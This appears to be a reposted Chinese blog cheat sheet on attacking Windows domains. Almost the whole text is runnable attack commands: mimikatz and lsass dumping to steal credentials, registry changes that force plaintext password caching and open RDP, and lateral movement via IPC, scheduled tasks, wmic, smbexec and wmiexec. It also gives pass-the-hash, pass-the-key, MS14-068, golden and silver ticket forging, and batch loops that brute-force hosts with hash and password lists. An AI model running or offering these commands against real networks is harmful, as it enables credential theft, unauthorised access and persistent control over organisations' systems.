内网渗透-域渗透简单思路
文章目錄
- 1.權(quán)限提升
- 2.滲透姿勢(shì)
- 爆hash,爆aes key
- 爆hash
- 爆aes key
- 3.遠(yuǎn)程登錄
- 注冊(cè)表修改
- 連接命令
- 4.連接操作
- PTH攻擊(利用明文或hash連接)
- IPC(明文連接主機(jī))
- WMI(利用明文連接)
- SMB(利用明文或hash連接)
- RDP(利用明文或hash連接)
- WMI工具(利用明文或hash連接)
- PTK攻擊(aes key 進(jìn)行連接)
- PTT攻擊(權(quán)限維持)
- Golden ticket(黃金票據(jù))
- silver ticket(白銀票據(jù))
- 5.bat批量連接測(cè)試
1.權(quán)限提升
- 一開始一定要提到administrator或以上,才好繼續(xù)內(nèi)網(wǎng)滲透。
2.滲透姿勢(shì)
爆hash,爆aes key
爆hash
域用戶主機(jī)上傳mimikatz
- mimikatz.exe上執(zhí)行: privilege::debug sekurlsa::logonpasswords 則可報(bào)出hash
- 當(dāng)目標(biāo)為win10或2012R2以上時(shí),默認(rèn)在內(nèi)存緩存中禁止保存明文密碼,但可以通過修改注冊(cè)表的方式抓取明文。
- reg add
HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v
UseLogonCredential /t REG_DWORD /d 1 /f
procdump
- procdump -accepteula -ma lsass.exe lsass.dmp mimikatz.exe上執(zhí)行:
- sekurlsa::minidump lsass.dmp sekurlsa::logonPasswords
爆aes key
3.遠(yuǎn)程登錄
注冊(cè)表修改
開啟的3389方法:
1.通用開3389(優(yōu)化后):
- wmic RDTOGGLE WHERE ServerName=’%COMPUTERNAME%’ call
SetAllowTSConnections 1
2.For Win2003:
- REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" “Server /v
fDenyTSConnections /t REG_DWORD /d 00000000 /f
3.For Win2008:
- REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” "Server /v
fDenyTSConnections /t REG_DWORD /d 00000000 /f
4.For Every:
cmd開3389 win08 win03 win7 win2012 winxp
win08,三條命令即可:
-
wmic /namespace:\root\cimv2 erminalservices path
win32_terminalservicesetting where (__CLASS != “”) call
setallowtsconnections 1 -
wmic /namespace:\root\cimv2 erminalservices path
win32_tsgeneralsetting where (TerminalName =‘RDP-Tcp’) call
setuserauthenticationrequired 1 -
reg add “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server” /v
fSingleSessionPerUser /t REG_DWORD /d 0 /f
win2012通用;win7前兩條即可。權(quán)限需要run as administrator。
連接命令
- windows: mstsc
- linux: rdesktop 192.168.3.21:3389
4.連接操作
PTH攻擊(利用明文或hash連接)
IPC(明文連接主機(jī))
在拿下一臺(tái)內(nèi)網(wǎng)主機(jī)后,通過本地信息搜集收集用戶憑證等信息后,如何橫向滲透拿下更多的主機(jī)?這里僅介紹at&schtasks命令及相關(guān)工具的使用,在已知目標(biāo)系統(tǒng)的用戶明文密碼或者h(yuǎn)ash的基礎(chǔ)上,直接可以在遠(yuǎn)程主機(jī)上執(zhí)行命令。
獲取到某域主機(jī)權(quán)限->minikatz得到密碼(明文,hash)->用到信息收集里面域用戶的列表當(dāng)做用戶名字典->用到密碼明文,hash當(dāng)做密碼字典-》嘗試連接->創(chuàng)建計(jì)劃任務(wù)(at|schtasks)->執(zhí)行文件可為后門或者相關(guān)命令
一、利用流程
net use \server\ipc$“password” /user:username # 工作組
net use \server\ipc$“password” /user:domain\username #域內(nèi)
dir \xx.xx.xx.xx\C$\ # 查看文件列表
copy \xx.xx.xx.xx\C$\1.bat 1.bat # 下載文件
copy 1.bat \xx.xx.xx.xx\C$\1.bat # 復(fù)制文件
net use \xx.xx.xx.xx\C$\1.bat /del # 刪除IPC
net view xx.xx.xx.xx # 查看對(duì)方共享
建立IPC常見的錯(cuò)誤代碼
(1)5:拒絕訪問,可能是使用的用戶不是管理員權(quán)限,需要先提升權(quán)限
(2)51:網(wǎng)絡(luò)問題,Windows 無法找到網(wǎng)絡(luò)路徑
(3)53:找不到網(wǎng)絡(luò)路徑,可能是IP地址錯(cuò)誤、目標(biāo)未開機(jī)、目標(biāo)Lanmanserver服務(wù)未啟動(dòng)、有防火墻等問題
(4)67:找不到網(wǎng)絡(luò)名,本地Lanmanworkstation服務(wù)未啟動(dòng),目標(biāo)刪除ipc$
(5)1219:提供的憑據(jù)和已存在的憑據(jù)集沖突,說明已建立IPC$,需要先刪除
(6)1326:賬號(hào)密碼錯(cuò)誤
(7)1792:目標(biāo)NetLogon服務(wù)未啟動(dòng),連接域控常常會(huì)出現(xiàn)此情況
(8)2242:用戶密碼過期,目標(biāo)有賬號(hào)策略,強(qiáng)制定期更改密碼
建立IPC失敗的原因
(1)目標(biāo)系統(tǒng)不是NT或以上的操作系統(tǒng)
(2)對(duì)方?jīng)]有打開IPC$共享
(3)對(duì)方未開啟139、445端口,或者被防火墻屏蔽
(4)輸出命令、賬號(hào)密碼有錯(cuò)誤
二、[at] & [schtasks]
#at 小于等于windows2008
net use \192.168.1.5 Password /user:admin # 建立ipc連接:
copy add.bat \192.168.1.5\C$\Inetpub # 拷貝執(zhí)行腳本到目標(biāo)機(jī)器
net time \192.168.1.5 # 查看目標(biāo)時(shí)間,可能本地時(shí)間與目標(biāo)時(shí)間不符
at \192.168.1.5 21:52 c:\Inetpub\add.bat # 添加計(jì)劃任務(wù)
at \192.168.1.5 # 查看任務(wù)列表
#schtasks 大于windows2008
net use \192.168.1.5 Password /user:admin # 建立ipc連接:
copy add.bat \192.168.1.5\C$\Inetpub # 拷貝執(zhí)行腳本到目標(biāo)機(jī)器
net time \192.168.1.5 # 查看目標(biāo)時(shí)間,可能本地時(shí)間與目標(biāo)時(shí)間不符
schtasks /create /s 192.168.1.5 /ru “SYSTEM” /tn adduser /sc DAILY /tr c:\Inetpub\add.bat /F #創(chuàng)建adduser計(jì)劃任務(wù)
schtasks /run /s 192.168.1.5 /tn adduser /i #運(yùn)行adduser計(jì)劃任務(wù)
schtasks /delete /s 192.168.1.5 /tn adduser /f # 刪除計(jì)劃任務(wù)
WMI(利用明文連接)
自帶WMIC 明文傳遞 無回顯
- wmic /node:192.168.3.21 /user:administrator /password:Admin12345
process call create “cmd.exe /c ipconfig >C:\1.txt”
SMB(利用明文或hash連接)
- smbexec ./admin:password@192.168.3.21
- smbexec domain/admin:password@192.168.3.21
- smbexec -hashes :HASH ./admin@192.168.3.21
- smbbexec -hashes :HASH domain/admin@192.168.3.21
- smbexec -hashes :ccef208c6485269c20db2cad21734fe7
./administrator@192.168.3.21
RDP(利用明文或hash連接)
- 除了上述講到的IPC,WMI,SMB等協(xié)議的鏈接外,獲取到的明文密碼或HASH密文也可以通過RDP協(xié)議進(jìn)行鏈接操作。
RDP明文密碼鏈接
- windows: mstsc
- linux: rdesktop 192.168.3.21:3389
RDP密文HASH鏈接
- windows Server需要開啟 Restricted Admin mode,在Windows 8.1和Windows Server
2012 R2中默認(rèn)開啟,同時(shí)如果Win 7 和Windows Server 2008
R2安裝了2871997、2973351補(bǔ)丁也支持;開啟命令: - REG ADD “HKLM\System\CurrentControlSet\Control\Lsa” /v
DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f
開啟后運(yùn)行:
- mstsc.exe /restrictedadmin
- mimikatz.exe
- privilege::debug
- sekurlsa::pth /user:administrator /domain:remoteserver
/ntlm:d25ecd13fddbb542d2e16da4f9e0333d “/run:mstsc.exe
/restrictedadmin”
WMI工具(利用明文或hash連接)
- wmiexec ./administrator:Admin12345@192.168.3.21 “whoami”
- wmiexec -hashes :HASH ./admin@192.168.3.21 “whoami”
- wmiexec -hashes :ccef208c6485269c20db2cad21734fe7
./administrator@192.168.3.21 “whoami”
PTK攻擊(aes key 進(jìn)行連接)
PTK(pass the key) #利用的aeskey進(jìn)行的滲透測(cè)試
#獲取用戶aes key
mimikatz “privilege::debug” “sekurlsa::ekeys”
#注入aes key
mimikatz “privilege::debug” “sekurlsa::pth /user:mary /domain:god.org /aes256:c4388a1fb9bd65a88343a32c09e53ba6c1ead4de8a17a442e819e98c522fc288”
#目標(biāo)系統(tǒng):安裝kb2871997補(bǔ)丁
PTT攻擊(權(quán)限維持)
Kerberos協(xié)議在域中,簡(jiǎn)要介紹一下:
- 客戶機(jī)將明文密碼進(jìn)行NTLM哈希,然后和時(shí)間戳一起加密(使用krbtgt密碼hash作為密鑰),發(fā)送給kdc(域控),kdc對(duì)用戶進(jìn)行檢測(cè),成功之后創(chuàng)建TGT(Ticket-Granting
Ticket) - 將TGT進(jìn)行加密簽名返回給客戶機(jī)器,只有域用戶krbtgt才能讀取kerberos中TGT數(shù)據(jù)
- 然后客戶機(jī)將TGT發(fā)送給域控制器KDC請(qǐng)求TGS(票證授權(quán)服務(wù))票證,并且對(duì)TGT進(jìn)行檢測(cè)
- 檢測(cè)成功之后,將目標(biāo)服務(wù)賬戶的NTLM以及TGT進(jìn)行加密,將加密后的結(jié)果返回給客戶機(jī)。
- ptt攻擊的部分就不是簡(jiǎn)單的NTLM認(rèn)證了,它是利用Kerberos協(xié)議進(jìn)行攻擊的,這里就介紹三種常見的攻擊方法:
MS14-068,Golden ticket(黃金票據(jù)),SILVER ticket(白銀票據(jù))
#MS14-068
-
#查看當(dāng)前sid whoami/user
-
mimikatz # kerberos::purge
-
//清空當(dāng)前機(jī)器中所有憑證,如果有域成員憑證會(huì)影響憑證偽造
-
mimikatz # kerberos::list
-
//查看當(dāng)前機(jī)器憑證
-
mimikatz # kerberos::ptc
-
票據(jù)文件 //將票據(jù)注入到內(nèi)存中
#利用ms14-068生成TGT數(shù)據(jù)
- ms14-068.exe -u 域成員名@域名 -s sid -d 域控制器地址 -p 域成員密碼
- MS14-068.exe -u mary@god.org -s
S-1-5-21-1218902331-2157346161-1782232778-1124 -d 192.168.3.21 -p
admin!@#45
#票據(jù)注入
- mimikatz.exe “kerberos::ptc TGT_mary@god.org.ccache” exit
#查看憑證列表 klist
#利用net use載入
-
net use \192.168.3.21\c$
-
dir \192.168.3.21\c$
#利用kekeo生成TGT數(shù)據(jù)
#生成票據(jù)
- kekeo “tgt::ask /user:mary /domain:god.org
/ntlm:518b98ad4178a53695dc997aa02d455c”
#導(dǎo)入票據(jù)
- kerberos::ptt TGT_mary@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi
#查看憑證 klist
#利用net use載入
-
net use \192.168.3.21\c$
-
dir \192.168.3.21\c$
權(quán)限維持-Golden ticket
Golden ticket(黃金票據(jù))
- Golden
ticket的作用是可以生成任意用戶的tgt,那么問題就來了,是什么條件能夠讓他生成任意用戶的tgt呢?還得要看kerberos認(rèn)證的過程,在windows認(rèn)證過程中,客戶端將自己的信息發(fā)送給KDC,然后KDC使用krbtgt用戶密碼的hash作為密鑰進(jìn)行加密,生成TGT。那么如果獲取到了krbtgt的密碼hash值,是不是就可以偽造任意tgt了。因?yàn)閗rbtgt只有域控制器上面才有,所以使用黃金憑據(jù)意味著你之前拿到過域控制器的權(quán)限,黃金憑據(jù)可以理解為一個(gè)后門。
#偽造黃金憑據(jù)需要具備下面條件:
- krbtgt用戶的hash(有域控制器權(quán)限)
- 域名稱
- 域的SID值
- 要偽造的用戶名
#域控DC導(dǎo)出hash krbtgt
-
privilege::debug
-
lsadump::lsa /patch
-
b097d7ed97495408e1537f706c357fc5
#生成tgt憑證
- mimikatz # kerberos::golden /user:administrator /domain::god.org
/sid:S-1-5-21-1218902331-2157346161-1782232778-1124
/krbtgt:b097d7ed97495408e1537f706c357fc5 /ticket
#注入憑證
- mimikatz # kerberos::ptt ticket.kirbi
#查看憑證 klist
##利用net use載入
-
net use \192.168.3.21\c$
-
dir \192.168.3.21\c$
權(quán)限維持-silver ticket
silver ticket(白銀票據(jù))
- silver ticket和golden
ticket不同的是,它不需要和域控制器進(jìn)行通信,原理是偽造TGS,使用的是計(jì)算機(jī)賬戶的hash進(jìn)行加密的,所以只能訪問指定的權(quán)限。不像是Golden
ticket,是由krgtgt用戶的密碼hash進(jìn)行加密,偽造tgt可以獲取到所有權(quán)限。白銀票據(jù)這里只是對(duì)單一的服務(wù)進(jìn)行授權(quán),利用過程和golden
ticket差不多,首先上域控制器中,把機(jī)器的ntlm hash(rc4加密)
dump下來,然后在普通域用戶機(jī)器進(jìn)行偽造權(quán)限,進(jìn)行ptt.
#域控導(dǎo)出hash
- privilege::debug
- sekurlsa::logonpasswords
#攻擊3.21下的cifs(文件共享服務(wù))
- kerberos::golden /domain:god.org
/sid:S-1-5-21-1218902331-2157346161-1782232778 /target:192.168.3.21
/rc4:8432d4fa4430ecf56927dbabd1b4d36b /service:cifs /user:mary /ptt
PTT(pass the ticket) #利用的票據(jù)憑證TGT進(jìn)行的滲透測(cè)試
5.bat批量連接測(cè)試
#利用hash驗(yàn)證主機(jī)列表ips.txt
FOR /F %%i in (ips.txt) do atexec.exe -hashes :HASH ./administrator@%%i whoami
#指定主機(jī)進(jìn)行用戶hash列表(hashes.txt)爆破
FOR /F %%i in (hashes.txt) do atexec.exe -hashes %%i ./administrator@192.168.3.76 whoami
#指定主機(jī)進(jìn)行明文密碼列表(passwords.txt)爆破
FOR /F %%i in (passwords.txt) do atexec.exe ./administrator:%%i@192.168.3.76 whoami
#利用明文密碼驗(yàn)證主機(jī)列表ips.txt
FOR /F %%i in (ips.txt) do atexec.exe ./administrator:password123@%%i whoami
總結(jié)
以上是生活随笔為你收集整理的内网渗透-域渗透简单思路的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: msfvenom生成木马和内网穿透
- 下一篇: 红队测试之邮箱打点